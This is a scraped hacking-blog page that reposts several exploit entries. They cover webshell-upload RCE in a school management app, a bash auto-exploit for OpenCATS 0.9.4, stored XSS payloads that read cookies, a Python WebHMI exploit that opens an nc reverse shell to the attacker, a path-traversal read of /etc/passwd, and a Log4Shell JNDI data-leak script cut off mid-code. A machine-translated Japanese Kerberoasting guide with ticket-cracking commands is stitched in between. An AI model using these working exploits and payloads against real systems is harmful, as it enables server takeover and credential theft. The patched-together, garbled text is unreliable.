# Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)
# Exploit Author: fuuzap1
# Date: 7-12-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
# Version: 1.0
# Tested on: windows
# Vulnerable page: http://localhost/admin/examQuestion
Technical description:
A unrestricted file upload vulnerability exists in the Free school
management software v1.0. An attacker can leverage this vulnerability in
order to get a remote code execution on the affected web server. Once a php
webshell containing "<?php system($_GET["cmd"]); ?>" gets uploaded it is
getting save into /uploads/exam_question/ directory, and is accessible by
all users. the attacker can gain remote code execution on the web server.
Steps to exploit:
1) Navigate to http://localhost/admin/manage_profile
2) click "ADD NEW QUESTION PAPER" edit base infomation
3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in
the Field "upload Drag and drop a file here or click"
3) Click "save"
4) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then
php code execution
Proof of concept (Poc):
The following payload will allow you to run the javascript -
<?php system($_GET["cmd"]); ?>
---
POST /admin/examQuestion/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------183813756938980137172117669544
Content-Length: 1331
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/examQuestion
Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q
Upgrade-Insecure-Requests: 1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="name"
test4
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="class_id"
2
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="subject_id"
5
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="timestamp"
2021-12-08
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="teacher_id"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_type"
txt
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="status"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="description"
123123
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="_wysihtml5_mode"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_name"; filename="cmd.php"
Content-Type: application/octet-stream
<?php eval($_GET["cmd"]); ?>
-----------------------------183813756938980137172117669544--
---
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863128492
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server
#!/bin/bash
if [ $# -eq 0 ]
then
echo "Usage: $0 <target URL>"
exit
fi
# if a payload doesn't work, try another
payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'
target=$1
green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"
#====================== Functions
rev() {
while true
do echo -n -e "\n$ "
read cmd
curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
done
}
upload() {
curl -skL $1/$2 \
-H "Connection: close" \
-F resumeFile=@"$3;type=application/x-php" \
-F ID="$firstJb" \
-F candidateID="-1" \
-F applyToJobSubAction="resumeLoad" \
--compressed \
--insecure
}
getVersion() {
ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
if [ -z "${ver}" ]
then
ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
if [ -z "${ver}" ]
then
echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
return 0
fi
fi
echo -e "${green}[*] Version detected: $ver${reset}"
}
writePayload(){
tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
file=`basename $tmpfile`
echo "$1" > $tmpfile
}
banner(){
echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
echo -e "\n"
}
#======================
banner
echo "[*] Attacking target $target"
echo "[*] Checking CATS version..."
getVersion $target
#exit
echo "[*] Creating temp file with payload..."
writePayload "$payload"
#exit
echo "[*] Checking active jobs..."
jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] No active jobs found.${reset}"
echo "[*] Trying another path..."
jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] Couldn't find any active job.${reset}"
exit
fi
fi
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
echo "[*] Sending payload..."
req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
echo "[*] Checking by another method..."
sed -i "s/GIF87a//" $tmpfile
req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't upload payload...${reset}"
exit
fi
fi
echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
rm $tmpfile
echo "[*] Checking shell..."
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if `echo $check | grep -q "0x7359"`
then
echo -e "${green}[+] Got shell! :D${reset}"
curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
rev $target/upload/careerportaladd/$file
else
echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi
# Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: fuzzyap1
# Date: 7-12-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
# Version: 1.0
# Tested on: windows
# Vulnerable page: http://localhost/admin/enquiry_category
# Vulnerable Parameters: "category"
Technical description:
A stored XSS vulnerability exists in the Event management software. An
attacker can leverage this vulnerability in order to run javascript on the
web server surfers behalf, which can lead to cookie stealing, defacement
and more.
Steps to exploit:
1) Navigate to http://localhost/admin/enquiry_category
2) Insert your payload in the "category" parameter
3) Click "save"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert(document.cookie)>
---
POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------151631281127875309002088019539
Content-Length: 490
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/enquiry_category
Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;
ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0
Upgrade-Insecure-Requests: 1
-----------------------------151631281127875309002088019539
Content-Disposition: form-data; name="category"
This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)>
-----------------------------151631281127875309002088019539
Content-Disposition: form-data; name="purpose"
Payment
-----------------------------151631281127875309002088019539
Content-Disposition: form-data; name="whom"
Tutorial
-----------------------------151631281127875309002088019539--
---
Steps to exploit:
1) Navigate to http://localhost/admin/manage_profile
2) Insert your payload in the "anme" parameter
3) Click "save"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert('xss')>
---
POST /admin/manage_profile/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------13285163425854907563979323722
Content-Length: 519
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/manage_profile
Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16
Upgrade-Insecure-Requests: 1
-----------------------------13285163425854907563979323722
Content-Disposition: form-data; name="name"
Administrator"><img src=# onerror=alert(document.cookie)>
-----------------------------13285163425854907563979323722
Content-Disposition: form-data; name="email"
admin@admin.com
-----------------------------13285163425854907563979323722
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------13285163425854907563979323722--
---
0x01 SPN定義
サービスプリンシパル名(SPN)は、特定のKerberosターゲットコンピューターを独自に識別するためにKerberosクライアントが使用するサービスインスタンス名です。 Kerberos AuthenticationはSPNを使用して、サービスインスタンスをサービスログインアカウントに関連付けます。森林全体のコンピューターに複数のサービスインスタンスがインストールされている場合、各インスタンスには独自のSPNが必要です。クライアントが複数の名前で認証できる場合、特定のサービスインスタンスには複数のSPNを持つことができます。たとえば、SPNには常にサービスインスタンスを実行するホスト名が含まれているため、サービスインスタンスはホストの各名前またはエイリアスのSPNを登録できます。
0x02 SPNスキャン
SNスキャンは、Kerberosサービスインスタンス名をスキャンすることもできます。アクティブなディレクトリ環境でサービスを発見する最良の方法は、「SPNスキャン」を使用することです。特定のSPNタイプのサービスプリンシパル名を要求してサービスを見つけることにより、ネットワークポートスキャンを介したSPNスキャン攻撃者の主な利点は、SPNスキャンでは、ネットワークに接続された各IPがサービスポートを確認する必要がないことです。 SPNスキャンは、LDAPクエリを介してドメインコントローラーにサービスの発見を実行します。 SPNクエリは通常のKerberosチケットの一部であるため、クエリを使用できない場合は、ネットワークポートスキャンで確認できます。
1.SPNフォーマット
spn=serviceclass "/" hostname [":" port] ["/" serviceName]
ServiceClass=MSSQL
servicename=sql.bk.com
で:
ServiceClass: Webサービスのwwwなどのサービスクラスの文字列を識別します
HOSTNAME:文字列はシステムの名前です。これは、完全に適格なドメイン名(FQDN)である必要があります。
PORT:番号はサービスのポート番号です。
ServicEname:サービスの著名な名前(DN)、ObjectGuid、インターネットホスト名、または完全に適格なドメイン名(FQDN)である文字列。
注:サービスクラスとホストが必要なパラメーターですが、ポートとサービス名はオプションです。ホストとポートの間のコロンは、ポートが存在する場合にのみ必要です。
2。一般的なサービスとSPNサービスインスタンス名
mssqlsvc/adsmssqlap01.adsecurity.org:1433
交換
Exchangemdb/adsmsexcas01.adsecurity.org
RDP
The Termerv/adsmsexcas01.adsecurity.org
WSMAN/WINRM/PSリモート
wsman/adsmsexcas01.adsecurity.org
Hyper-Vホスト
Microsoft Virtual Console Service/adsmshv01.adsecurity.org
vmware vcenter
sts/adsmsvc01.adsecurity.org
2。 SPNスキャンPSスクリプト
MSSQLサービスでSPNサービスインスタンスの名前を発見してください。
https://github.com/pyrotek3/powershell-ad-recon/blob/master/discover-psmssqlservers
他のSPNサービスインスタンス名クエリ:
https://github.com/pyrotek3/powershell-ad-recon
各サーバーはKerberos認証サービスにSPNを登録する必要があるため、これはポートスキャンを実行せずに環境に関する情報を収集するのに最適な方法を提供します。
例えば:
管理者は、「MetCorpKCS17」という名前のサーバーにMicrosoft SQL Serverをインストールおよび構成し、ポート3170 3および3171に耳を傾けるSQLインスタンスを使用します。
その後、サービスクラスとインスタンス名は次のように生成されます。
MSSQLSVC/METCORPKCS17.ADSECURITY.org:3170MSSQLSVC/METCORPKCS17.ADSECURITY.org:3171
青い部分はサービスクラス、オレンジ色の部分はコンピューターのFQDN、緑の部分はネットワークポート番号です。KerberosはSPN要求がディレクトリの既存のSPNに一致するため、最後の番号は必ずしもサーバー上のポートではありません。上記のように、ほとんどの場合、SPNに記録されたポートはサーバー上のリスニングポートであり、すべてのSPNがポートを含むわけではありません。これで、Active DirectoryドメインまたはフォレストでSQLサーバーを発見するためのより良い方法があります。ServicePrincipalName=MSSQL*
0x03
SPNスキャンとクラッキングTGSチケットはMSSQLサービスを使用してSPNを例として構成します
参照構成アドレス:
https://technet.microsoft.com/zh-cn/library/bb735885.aspx
1。SQLの場合
サーバーサービスアカウント登録SPN
手動登録:
setSpn -a mssqlsvc/myhost.redmond.microsoft.com:1433 accountname
対応する名前のインスタンス:
setSpn -a mssqlsvc/myhost.redmond.microsoft.com/instancename accountname
2。ユーザーに対応するSPNを確認します。
setspn -l ruos \ sql -service
3. ADSI(ADSIEDIT.MSC)を使用して、ユーザー属性を表示します
4.広告のユーザーにサービスログイン権限を指定します。
gpo_name \ computer
Configuration \ Windows Settings \ Security Settings \ Local Policies \ User Rights
割り当て
サービスとしてログオンします
5 .変更
SQL Server Serviceアカウントはドメインユーザーアカウントです
6。ブルートフォースケルベロス
TGSチケット
暗号化タイプはRC4_HMAC_MD5であるため、Kerberos Protocol TGS-REPの4番目のステップは、サービスアカウントのNTLMパスワードで暗号化されたチケットを返します。
7.SPNスキャン
setspn -t
ドメイン-Q */*
または
https://github.com/pyrotek3/powershell-ad-recon/
8。spnをリクエストします
Kerberosのチケット
PS C: \
Add -Type -Assemblyname System.IdentityModel
PS C: \
new-Object System.IdentityModel.tokens.kerberosRequestorseCurityToken
-argumentlist 'mssqlsvc/webtst01.ruos.org/sqlexpress'
9。チケットを表示およびエクスポートします
デフォルトの構成暗号化タイプはAES256_HMACであり、TGSREPCRACKをクラックできません。サーバーグループポリシーで暗号化タイプをRC4_HMAC_MD5として指定できます。
gpo_name \ computer configuration \ windows settings \ security settings \ local
ポリシー\セキュリティオプション
Network Security: Kerberosに許可される暗号化タイプを構成します
10。オフラインのひび割れ
TGSREPACK(RC4_HMAC_MD5のみ)、またはハッシュカットを使用してハッシュを保存してクラックします。
ハッシュをエクスポートする(他の暗号化タイプ用)
getUserSpns.py -Request -OutputFile hash.txt -dc-ip 192.168.6.2 ruos.org/user2
または、請求書からkirbi2john.pyをエクスポートします
1-40A00000-USER2@MSSQLSVC~webtst01.ruos.org~sqlexpress-ruos.org.kirbi
S2。 hashcat64.exe -m 13100 hash.txt emple.dict –force
次のように他のひび割れツールを参照することもできます。
https://github.com/nidem/kerberoast
https://github.com/coresecurity/impacket
https://github.com/nidem/kerberoast/blob/master/kirbi2john.py
0x04
Active Directoryサービスの包括的な参照テーブルプリンシパル名(SPN)Acronisagent:Acronisバックアップおよびデータ回復ソフトウェア用
Adtserver:ACSを備えたMicrosoftシステム
センターオペレーションマネージャー(2007/2012)管理サーバー
Afpserver:Appleアーカイブプロトコル
AGPMSERVER:Microsoft Advanced Group Policy Management(AGPM)
aradminsvc-タスクマスターロールサーバー
ARSSVC-タスクマスターロールサーバー
BOCMS:コマーシャルCMS
BOSSO:ビジネスオブジェクト
CESREMOTE:VMware上のCitrix VDIソリューションに関連して、多くのVDIワークステーションにはこのSPNがあります。
CIFS:ユニバーサルインターネットファイルシステム
CMRCService:Microsoft System Center Configuration Manager(SCCM)リモートコントロール
CusessionKeysVr:Cisco Unity VoIPシステム
CVS:CVSライブラリ
DFSR *:分散ファイルシステム
DNS:ドメイン名サーバー
E3514235-4B06-11D1-AB04-00C04FC2DCD2:NTDS DC RPCコピー
E3514235-4B06-11D1-AB04-00C04FC2DCD2-ADAM:Adam Instance
EDVR:ExacqVision Service
ExchAngeAB:アドレス帳サービスを交換(通常はNSPI、通常はすべてのGCをサポートするドメインコントローラー)
ExchangemDB:RPCクライアントアクセスサーバーの役割
Exchangerfr:アドレス帳サービスを交換します
FCSVR:Apple Final Cut Server
filerepservice:wsfilerepservice.exe
FimService:Microsoft
最前線の識別マネージャー(FIM)
FTP:ファイル転送プロトコル
GC:ドメインコントローラーグローバルカタログサービス
HDFS:Hadoop(Ambari)
ホスト:ホストサービスはホストを表します。ホストSPNは、サービスチケットの作成時にKerberosプロトコルによって長期キーを使用するホストアカウントにアクセスするために使用されます。
HTTP:Kerberos認証をサポートするHTTPネットワークサービスのSPN
Hyper-Vレプリカサービス:Microsoft Hyper-Vレプリカサービス
IMAP:インターネットメッセージアクセスプロトコル
IMAP4:インターネットメッセージアクセスプロトコルバージョン4
IPP:インターネット印刷プロトコル
ISCSITARGET:ISCSI構成
Kadmin:Kerberos
LDAP:ドメインコントローラーやAdamインスタンスなどのLDAPサービス。
MAGFS:Maginatics Magfs
MapRed:Cloudera
Microsoft Virtual Consoleサービス:HyperVホスト
Microsoft Virtual System Migration Service:P2Vサポート(Hyper-V)
Mongod:Mongodb Enterprise
Mongos:Mongodb Enterprise
MSClusterVirtualServer:Windowsクラスターサーバー
MSOLAPSVC:SQL Server Analysis Service
MSOLAPSVC.3:SQL Server Analysis Service
MSOLAPDISCO.3:SQL Server Analysis Service
MSOMHSVC:Microsoft System Center Operations Manager(2007/2012)管理サーバー
MSOMSDKSVC:Microsoft System
センターオペレーションマネージャー(2007/2012)管理サーバー
MSSERVERCLUSTER:Windowsクラスターサーバー
MSSERVERCLUSTERMGMTAPI:このクラスターAPIでは、このSPNにKerberosを使用してサーバーに認証する必要があります
MSSQL:Microsoft SQL
サーバ
MSSQLSVC:Microsoft SQL
サーバ
MSSQL $ ADOBECONNECT:Adobe ConnectをサポートするMicrosoft
SQL Server
MSSQL $ BIZTALK:Microsoft SQL
サーバーはMicrosoftをサポートします
biztalkサーバー
MSSQL $ BusinessObjects:ビジネスオブジェクトをサポートするMicrosoft
SQL Server
MSSQL $ DB01NETIQ:NETIQをサポートするMicrosoft SQL
サーバ
NFS:ネットワークファイルシステム
Nppolicyevaluator:Dell Quest監査人
Nprepository 4(Changeauditor):Dell Quest Change
監査人
NPREPOSITORY4(CAAD):Dell Quest監査人
NPREPOSITORY4(デフォルト):Dell Task Auditor
NTFRS *:NTファイルコピーサービス
Oracle:Oracle Kerberos認証
Pcast:Apple Podcastプロデューサー
PCNSCLNT:自動パスワード同期ソリューション(MIIS 2003&FIM)
ポップ:電子メール契約
POP3:電子メール契約バージョン3
PVSSOAP:Citrix
プロビジョニングサービス(7.1)
制限付きkrbhost:サービスクラスの文字列が「restrictedkrbhost」に等しいSPNを使用するサービスクラス。サービスバウチャーはコンピューターアカウントキーを使用してセッションキーを共有します。
RPC:リモートプロシージャコールサービス
SAP:SAP/SAPSERVICE
シド
SAS:SASサーバー
SCVMM:システムセンター仮想マシンマネージャー
Secshd:IBM Infosphere
SIP:セッションスタートアッププロトコル
SMTP:単純なメール転送プロトコル
SMTPSVC:単純なメール転送プロトコル
SoftGrid:Microsoftアプリケーション仮想化(APP-V)以前は「SoftGrid」
STS:VMware SSOサービス
SQLAGENT $ DB01NETIQ:SQL Service for Netiq
Tapenego:Microsoftファイアウォール(ISA、TMGなど)などのルーティングアプリケーションに関連付けられています。
The ThersRV:Microsoftリモートデスクトッププロトコルサービス、ターミナルサービスとしても知られています。
TNETD:Juniper Kerberos認証
「TNETDは、ルーティングエンジンやパケット転送エンジンなどのさまざまなコンポーネント間の内部通信に使用されるデーモンです」
VMRC:Microsoft Virtual Server 2005
VNC:VNCサーバー
VPN:仮想プライベートネットワーク
VPRORECOVERY BACKUP Exec System Recovery Agent 7.0
VPRORECOVERY BACKUP Exec System Recovery Agent 8.0
VPRORECOVERYバックアップEXECシステム回復エージェント9.0
vProrecovery Norton Clone Proxy 12.0
vprorecoverynorton
クローンプロキシ14.0VPRORECOVERY NORTON CLONE Proxy 15.0
VProRecovery Symantec System Recovery Agent 10.0
VProRecovery Symantec System Recovery Agent 11.0
VProRecovery Symantec System Recovery Agent 14.0
vssrvc: Microsoft Virtual Server (2005)
WSMAN:Windowsリモート管理(WS管理標準に基づく)サービス
XMPP/XMPP:拡張可能なメッセージとレンダリングプロトコル(Jabber)
Xgrid:Appleの分散(グリッド)計算/
Mac OS X 10.6サーバー管理
糸:クルダラ
MapReduce
注:ドメインコントローラーは、パブリックSPNをホストSPNに自動的にマッピングします。コンピューターがドメインに結合されると、ホストSPNはすべてのコンピューターアカウントのServicePrincipalNameプロパティに自動的に追加されます。ドメインコントローラーSPNマッピングは、SPNMAppingsのプロパティによって制御されます。
「CN=ディレクトリ
サービス、cn=windowsnt、cn=services、cn=configuration
SPNは自動的にホスト(SPNMAPPING属性値):Alerterにマッピングされます
appmgmt
CISVC
Clipsrv
ブラウザ
DHCP
dnscache
レプリケーター
eventlog
Eventsystem
政策立案者
オークリー
dmserver
DNS
MCSVC
ファックス
msserver
IAS
メッセンジャー
Netlogon
ネットマン
netdde
netddedsm
nmagent
プラグプレイ
ProtectedStorage
ラスマン
rpclocator
RPC
RPCSS
RemoteaCcess
お返事お願いします
samss
scandsvr
SSRV
Seclogon
SCM
DCOM
CIF
スプーラ
SNMP
スケジュール
tapisrv
trksvr
trkwks
UPS
時間
勝ちます
www
http
W3SVC
iisadmin
MSDTC
# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://webhmi.com.ua/en/
# Version: WebHMI Firmware < 4.1
# CVE: CVE-2021-43936
# Tested on: WebHMI Firmware 4.0.7475
#!/usr/bin/python
import sys
import re
import argparse
import pyfiglet
import requests
import time
import subprocess
banner = pyfiglet.figlet_format("CVE-2021-43936")
print(banner)
print('Exploit for CVE-2021-43936')
print('For: WebHMI Firmware < 4.1')
login = "admin" #CHANGE ME IF NEEDED
password = "admin" #CHANGE ME IF NEEDED
class Exploit:
def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport
def exploitation(self):
payload = """<?php system($_GET['cmd']); ?>"""
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
headers_login = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'X-WH-LOGIN': login,
'X-WH-PASSWORD': password,
'X-Requested-With': 'XMLHttpRequest',
'Connection': 'close',
'Content-Length': '0'
}
url = 'http://' + target_ip + ':' + target_port
r = requests.Session()
print('[*] Resolving URL...')
r1 = r.get(url)
time.sleep(3)
print('[*] Trying to log in...')
r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
time.sleep(3)
print('[*] Login redirection...')
login_cookies = {
'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
'X-WH-CHECK-TRIAL':'true',
'il18next':'en',
}
r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
time.sleep(3)
print('[*] Uploading cmd.php file...')
files = {
'file': ('cmd.php', payload, 'application/x-php')
}
r4 = r.post(url + '/files.php', files=files, cookies=login_cookies)
time.sleep(3)
print('[*] Setting up netcat listener...')
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)
print('[*] Executing reverse shell...')
print('[*] Watchout for shell! :)')
r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies)
if (r5.status_code == 200):
print('[*] Got shell!')
while True:
listener.wait()
else:
print('[-] Something went wrong!')
listener.terminate()
def get_args():
parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
args = parser.parse_args()
return args
args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server
Proof of Concept:
GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: VulnIP
Connection: Keep-alive
# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
# Date: 12/12/2021
# Exploit Author: leonjza
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Version: <= 2.14.1
# CVE: CVE-2021-44228
#!/usr/bin/env python3
# Pure python ENV variable leak PoC for CVE-2021-44228
# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284
#
# 2021 @leonjza
import argparse
import socketserver
import threading
import time
import requests
LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self) -> None:
print(f' i| new connection from {self.client_address[0]}')
sock = self.request
sock.recv(1024)
sock.sendall(LDAP_HEADER)
data = sock.recv(1024)
data = data[9:] # strip header
# example response
#
# ('Java version 11.0.13\n'
# '\x01\x00\n'
# '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
# 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
data = data.decode(errors='ignore').split('\n')[0]
print(f' v| extracted value: {data}')
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def main():
parser = argparse.ArgumentParser(description='a simple log4j
<=2.14 information disclosure poc '
'(ref:
https://twitter.com/Black2Fan/status/1470281005038817284)')
parser.add_argument('--target', '-t', required=True, help='target uri')
parser.add_argument('--listen-host', default='0.0.0.0',
help='exploit server host to listen on
(default: 127.0.0.1)')
parser.add_argument('--listen-port', '-lp', default=8888,
help='exploit server port to listen on (default: 8888)')
parser.add_argument('--exploit-host', '-eh', required=True,
default='127.0.0.1',
help='host where (this) exploit server is reachable')
parser.add_argument('--leak', '-l', default='${java:version}',
help='value to leak. '
'see:
https://twitter.com/Rayhan0x01/status/1469571563674505217 '
'(default: ${java:version})')
args = parser.parse_args()
print(f' i| starting server on {args.listen_host}:{args.listen_port}')
server = ThreadedTCPServer((args.listen_host, args.listen_port),
ThreadedTCPRequestHandler)
serv_thread = threading.Thread(target=server.serve_forever)
serv_thread.daemon = True
serv_thread.start()
time.sleep(1)
print(f' i| server started')
payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
print(f' i| sending exploit payload {payload} to {args.target}')
try:
r = requests.get(args.target, headers={'User-Agent': payload})
print(f' i| response status code: {r.status_code}')
